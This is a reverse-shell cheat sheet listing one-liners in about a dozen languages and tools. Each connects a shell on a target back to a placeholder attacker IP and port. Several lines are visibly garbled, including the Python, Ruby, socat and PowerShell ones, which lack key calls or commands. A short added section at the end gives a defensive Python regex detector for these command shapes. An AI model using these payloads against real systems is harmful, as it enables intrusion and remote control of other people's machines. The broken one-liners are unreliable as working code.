Reverse Shell Cheat Sheet

A reverse shell is a shell session established on a connection that is initiated from the remote machine: the target machine connects back to the attacking machine. The attacking machine runs a listener on a port, on which it receives the connection; through that connection, code or command execution is achieved.

Placeholders to Replace

ip-address = Attacker IP address
port = Attacker port

Bash Reverse Shell

bash -i >& /dev/tcp/ip-address/port 0>&1

PHP Reverse Shell

php -r '$sock=fsockopen("ip-address",port);exec("/bin/sh -i <&3 >&3 2>&3");'

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip-address",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

Socat Reverse Shell

Attacker Payload Listener:
socat file:`tty`,raw,echo=0 TCP-L:port
Client Side:
/dev/shm exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip-address:port

Perl Reverse Shell

perl -e 'use Socket;$ip="ip-address";$port=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($ip)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ip-address:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby Reverse Shell

ruby -rsocket -e'"ip-address",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat Reverse Shell

nc  ip-address port -e /bin/sh

Ncat Reverse Shell

ncat ip-address port -e /bin/bash

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/sh","-c","exec 5<>/dev/tcp/ip-address/port;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

PowerShell Reverse Shell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("ip-address",port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

xTerm Reverse Shell

xterm -display ip-address:port

AWK Reverse Shell

awk 'BEGIN {s = "/inet/tcp/0/ip-address/port"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
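
Seen from the defending side, every one-liner above has the same shape: a TCP endpoint wired directly into a shell or interpreter. The following is an added example, not part of the original cheat sheet, that flags those shapes in process-creation command lines; the rule names, host names and sample events are constructed for illustration.

```python
import re

# Each rule keys on what makes the one-liner a reverse shell: a TCP endpoint
# wired straight into an interpreter or shell. Rule names are this example's own.
RULES = [
    ("dev_tcp_redirect", re.compile(r"/dev/tcp/[^/\s]+/\d+")),  # bash and the Java sh -c variant
    ("netcat_exec", re.compile(r"\bn(?:c|cat|etcat)\b.*\s-[ec]\s+\S*(?:sh|bash|cmd(?:\.exe)?)\b")),
    ("socat_exec", re.compile(r"\bsocat\b.*\bexec:", re.I)),
    ("python_socket_dup2", re.compile(r"\bpython[\d.]*\b.*socket.*os\.dup2\(")),
    ("php_fsockopen_exec", re.compile(r"\bphp\b.*fsockopen\(.*\bexec\(")),
    ("perl_socket_exec", re.compile(r"\bperl\b.*(?:sockaddr_in|IO::Socket::INET).*(?:exec|system)")),
    ("ruby_socket_exec", re.compile(r"\bruby\b.*-rsocket.*\bexec\b")),
    ("powershell_tcpclient", re.compile(r"powershell.*Net\.Sockets\.TCPClient.*\biex\b", re.I)),
    ("awk_inet_tcp", re.compile(r"\bg?awk\b.*/inet/tcp/")),
    ("xterm_remote_display", re.compile(r"\bxterm\b.*-display\s+\S+:\d+")),
]

def match_rules(cmdline):
    """Return the names of every rule whose pattern appears in cmdline."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """events: iterable of (host, cmdline). Returns [(host, cmdline, [rules])] for hits."""
    hits = []
    for host, cmdline in events:
        rules = match_rules(cmdline)
        if rules:
            hits.append((host, cmdline, rules))
    return hits

# Constructed process-creation events (192.0.2.0/24 is a documentation range).
SAMPLE_EVENTS = [
    ("web01", "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"),
    ("web01", "nc 192.0.2.10 4444 -e /bin/sh"),
    ("app02", "ncat 192.0.2.10 4444 -e /bin/bash"),
    ("app02", "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.0.2.10:4444"),
    ("ws03", "xterm -display 192.0.2.10:1"),
    # Benign look-alikes that must not alert:
    ("web01", "nc -zv 192.0.2.10 443"),
    ("app02", "socat TCP-LISTEN:8080,fork TCP:192.0.2.20:80"),
    ("ws03", "python3 -c 'import socket; print(socket.gethostname())'"),
]

if __name__ == "__main__":
    for host, cmdline, rules in scan(SAMPLE_EVENTS):
        print(f"{host}\t{','.join(rules)}\t{cmdline}")
```

Command-line matching misses encoded or renamed variants, so pair it with network telemetry that reports shells and interpreters owning outbound sockets.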